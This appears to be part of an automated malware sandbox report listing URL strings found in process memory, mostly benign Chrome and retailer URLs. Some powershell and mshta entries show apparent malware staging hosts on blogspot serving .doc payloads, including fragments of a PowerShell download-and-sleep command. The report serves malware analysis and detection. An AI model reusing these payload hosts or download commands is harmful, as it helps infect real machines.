                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/288119108
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/292282210
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/292285899
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/309028728
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/328301788
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/328837151
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/336844257
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/347601787
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/349489248
                      Source: mshta.exe, 0000001E.00000002.289587119886.000001FB4AF0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kalacpamarchcle.bn
                      Source: powershell.exe, 00000016.00000002.289540073156.0000022B3EFFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.289540073156.0000022B3F3C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.289697426953.000002AA3C22C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.289697426953.000002AA3BE3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kalacpamarchclean.blogspot.com
                      Source: powershell.exe, 0000001F.00000002.289697426953.000002AA3C28B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.289697426953.000002AA3C224000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kalacpamarchclean.blogspot.com/
                      Source: powershell.exe, 00000016.00000002.289540073156.0000022B3F3C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.289697426953.000002AA3C22C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kalacpamarchclean.blogspot.com/atom.xml
                      Source: powershell.exe, 00000016.00000002.289540073156.0000022B3EFFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.289697426953.000002AA3BE3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kalacpamarchclean.blogspot.com/chig.doc
                      Source: powershell.exe, 00000030.00000002.289861987067.000001400DDB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kalacpamarchclean.blogspot.com/chig.doc)
                      Source: powershell.exe, 00000016.00000002.289538420899.0000022B3CE47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kalacpamarchclean.blogspot.com/chig.doc)V
                      Source: powershell.exe, 0000001F.00000002.289689706318.000002AA39D22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kalacpamarchclean.blogspot.com/chig.doc)s
                      Source: powershell.exe, 00000016.00000002.289540073156.0000022B3EFFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.289697426953.000002AA3BE3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kalacpamarchclean.blogspot.com/chig.docXzTn
                      Source: chrome.exe, 00000023.00000002.289689896163.000060C400C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289688068452.000060C400AD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
                      Source: chrome.exe, 00000023.00000002.289678405479.000060C4001D0000.00000004.00000800.00020000.00000000.sdmp, AvastBrowserUpdate.exeString found in binary or memory: https://m.google.com/devicemanagement/data/api
                      Source: powershell.exe, 00000003.00000002.289648176628.0000029A43E37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://marchlkalanew6.blogspot.com
                      Source: svchost.exe, 0000001B.00000003.289716219780.0000018CD5639000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289716219780.0000018CD562F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289750972128.0000018CD5D02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289740415298.0000018CD560A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep
                      Source: powershell.exe, 00000003.00000002.289646568175.0000029A41F80000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.289647917859.0000029A438C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.289644863025.0000029A41CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep-Seconds6;
                      Source: powershell.exe, 00000003.00000002.289644863025.0000029A41CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep-Seconds6;?
                      Source: powershell.exe, 00000003.00000002.289644863025.0000029A41CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep934e089
                      Source: powershell.exe, 00000003.00000002.289644863025.0000029A41CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marchlkalanew6.blogspot.com/lundchikha.doc);start-sleep
                      Source: powershell.exe, 00000003.00000002.289648176628.0000029A43E37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://marchlkalanew6.blogspot.com/lundchikha.docXzTn
                      Source: chrome.exe, 00000023.00000002.289687814201.000060C400A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
                      Source: chrome.exe, 00000023.00000002.289686838940.000060C400968000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
                      Source: chrome.exe, 00000023.00000002.289686838940.000060C400968000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
                      Source: chrome.exe, 00000023.00000002.289686838940.000060C400968000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myshop.amplify.com/cart
                      Source: chrome.exe, 00000023.00000002.289678405479.000060C4001D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/
                      Source: chrome.exe, 00000023.00000002.289678597125.000060C400204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
                      Source: chrome.exe, 00000023.00000002.289678597125.000060C400204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
                      Source: chrome.exe, 00000023.00000002.289686838940.000060C400968000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://passwords.google/
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://poshmark.com/bundles/shop
                      Source: chrome.exe, 00000023.00000002.289679394257.000060C400314000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
                      Source: chrome.exe, 00000023.00000002.289677608816.000060C400140000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsingohttpgateway.googleapis.com/v1/ohttp/hpkekeyconfig?key=AIzaSyBOti4mM-6x9WDnZIjIe
                      Source: chrome.exe, 00000023.00000002.289676724934.000060C400088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
                      Source: wscript.exe, 00000002.00000002.289300300544.000001B693A79000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.289224685890.000001B6959A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure-oldnavy.gap.com/shopping-bag
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.newegg.com/shop/cart
                      Source: chrome.exe, 00000023.00000002.289678405479.000060C4001D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shop.advanceautoparts.com/web/OrderItemDisplay
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shop.lululemon.com/shop/mybag
                      Source: chrome.exe, 00000023.00000002.289689896163.000060C400C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289688068452.000060C400AD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/cart/
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.usps.com/store/cart/cart.jsp
                      Source: chrome.exe, 00000023.00000002.289690589537.000060C400CD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t0.gstatic.com/faviconV2
                      Source: chrome.exe, 00000023.00000002.289678405479.000060C4001D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/
                      Source: chrome.exe, 00000023.00000002.289693137102.000060C400FAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.ico
                      Source: svchost.exe, 0000001B.00000003.289662292355.0000018CD5C5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
                      Source: chrome.exe, 00000023.00000002.289690937954.000060C400D2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/search
                      Source: chrome.exe, 00000023.00000002.289690937954.000060C400D2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/search?ei=&fr=crmas&p=
                      Source: chrome.exe, 00000023.00000002.289690937954.000060C400D2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
                      Source: svchost.exe, 0000001B.00000003.289662292355.0000018CD5C5B000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289692770593.000060C400F50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: AvastBrowserUpdate.exeString found in binary or memory: https://update.googleapis.com/service/update2
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.abebooks.com/servlet/ShopBasketPL
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.academy.com/shop/cart
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.acehardware.com/cart
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.adorama.com/als.mvc/cartview
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ae.com/us/en/cart
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.altardstate.com/cart/
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.co.uk/gp/cart/view.html
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/gp/cart/view.html
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.anthropologie.com/cart
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.apple.com/shop/bag
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.atlassian.com/purchase/cart
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.att.com/buy/cart
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.backcountry.com/Store/cart/cart.jsp
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.basspro.com/shop/AjaxOrderItemDisplayView
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bathandbodyworks.com/cart
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bedbathandbeyond.com/store/cart
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.belk.com/shopping-bag/
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/cart
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bhphotovideo.com/find/cart.jsp
                      Source: powershell.exe, 0000001F.00000002.289697426953.000002AA3C28B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.289697426953.000002AA3C224000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.blogger.com/feeds/4439465790675702951/posts/default?alt=atom
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bloomingdales.com/my-bag
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.boostmobile.com/cart.html
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bricklink.com/v2/globalcart.page
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.brownells.com/aspx/store/cart.aspx
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.buybuybaby.com/store/cart
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.carid.com/cart.php
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.chegg.com/shoppingcart
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.containerstore.com/cart/list.htm
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.costco.com/CheckoutCartDisplayView
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.crateandbarrel.com/Checkout/Cart
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dickssportinggoods.com/OrderItemDisplay
                      Source: chrome.exe, 00000023.00000002.289681278813.000060C40050C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dillards.com/webapp/wcs/stores/servlet/OrderItemDisplay
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dsw.com/en/us/shopping-bag
                      Source: svchost.exe, 0000001B.00000003.289662292355.0000018CD5C5B000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289693137102.000060C400FAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: chrome.exe, 00000023.00000002.289693023110.000060C400F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
                      Source: chrome.exe, 00000023.00000002.289693023110.000060C400F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
                      Source: chrome.exe, 00000023.00000002.289693023110.000060C400F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.electronicexpress.com/cart
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.etsy.com/cart/
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eyebuydirect.com/cart
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fingerhut.com/cart/index
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.finishline.com/store/cart/cart.jsp
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.freepeople.com/cart/
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gamestop.com/cart/
                      Source: svchost.exe, 0000001B.00000003.289672424265.0000018CD5643000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289676724934.000060C400088000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289680389343.000060C4003D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                      Source: chrome.exe, 00000023.00000003.289661680901.000060C401030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289692653275.000060C400F2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289686622214.000060C400944000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                      Source: svchost.exe, 0000001B.00000003.289664137379.0000018CD5C68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289663937869.0000018CD5CDA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289740789317.0000018CD5639000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289665008728.0000018CD56E7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289716219780.0000018CD5639000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289750972128.0000018CD5D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome
                      Source: svchost.exe, 0000001B.00000003.289664137379.0000018CD5C52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289750972128.0000018CD5D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/
                      Source: chrome.exe, 00000023.00000002.289686838940.000060C400968000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/#safe
                      Source: svchost.exe, 0000001B.00000003.289664137379.0000018CD5C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/Google
                      Source: chrome.exe, 00000023.00000002.289686838940.000060C400968000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/browser-features/
                      Source: chrome.exe, 00000023.00000002.289686838940.000060C400968000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/browser-tools/
                      Source: svchost.exe, 0000001B.00000003.289664137379.0000018CD5C68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289663937869.0000018CD5CDA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289740789317.0000018CD5639000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289665008728.0000018CD56E7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289716219780.0000018CD5639000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289750972128.0000018CD5D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/next-steps.html?statcb=0&installdataindex=empty&defaultbrowser=0
                      Source: svchost.exe, 0000001B.00000003.289664137379.0000018CD5C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/next-steps.html?statcb=0&installdataindex=empty&defaultbrowser=0Google
                      Source: chrome.exe, 00000023.00000002.289688068452.000060C400AD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289689080726.000060C400BC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/
                      Source: svchost.exe, 0000001B.00000003.289664137379.0000018CD5C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chromeGoogle
                      Source: svchost.exe, 0000001B.00000003.289662292355.0000018CD5C5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/favicon.ico
                      Source: chrome.exe, 00000023.00000002.289693023110.000060C400F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                      Source: svchost.exe, 0000001B.00000003.289664137379.0000018CD5C6A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289664137379.0000018CD5C44000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289740789317.0000018CD5639000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289665008728.0000018CD56E7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289716219780.0000018CD5639000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289664137379.0000018CD5C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289750972128.0000018CD5D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=backslash&sca_esv=620c24330b4497e4&sca_upv=1&ei=UDzhZpjjMZyIptQPqai-
                      Source: svchost.exe, 0000001B.00000003.289664137379.0000018CD5C5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=backslash&sourceid=chrome&ie=UTF-8backslash
                      Source: svchost.exe, 0000001B.00000003.289664137379.0000018CD5C63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=backslash&sourceid=chrome&ie=UTF-8https://www.google.com/search?q=ba
                      Source: svchost.exe, 0000001B.00000003.289750972128.0000018CD5D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=tedst&oq=tedst&gs_lcrp=EgZjaHJvbWUyBggAEEUYOdIBBzkwNGowajSoAgCwAgE&s
                      Source: svchost.exe, 0000001B.00000003.289664137379.0000018CD5C5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=tedst&sourceid=chrome&ie=UTF-8tedst
                      Source: svchost.exe, 0000001B.00000003.289664137379.0000018CD5C5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=tedst&sourceid=chrome&ie=UTF-8tedst;
                      Source: svchost.exe, 0000001B.00000002.289985620973.0000018CD2B4C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289716219780.0000018CD5639000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289750972128.0000018CD5D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtedst%26oq%3Dtedst%2
                      Source: AvastBrowserUpdate.exeString found in binary or memory: https://www.google.com/support/installer/?
                      Source: chrome.exe, 00000023.00000002.289679806483.000060C40037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
                      Source: chrome.exe, 00000023.00000002.289678803219.000060C400298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
                      Source: chrome.exe, 00000023.00000002.289678405479.000060C4001D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
                      Source: chrome.exe, 00000023.00000002.289678405479.000060C4001D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
                      Source: chrome.exe, 00000023.00000002.289678405479.000060C4001D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289678597125.000060C400204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/token
                      Source: chrome.exe, 00000023.00000002.289678405479.000060C4001D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289678597125.000060C400204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.groupon.com/cart
                      Source: chrome.exe, 00000023.00000002.289683941213.000060C400784000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.guitarcenter.com/cart
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.harborfreight.com/checkout/cart
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hmhco.com/hmhstorefront/cart
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.homedepot.com/mycart/home
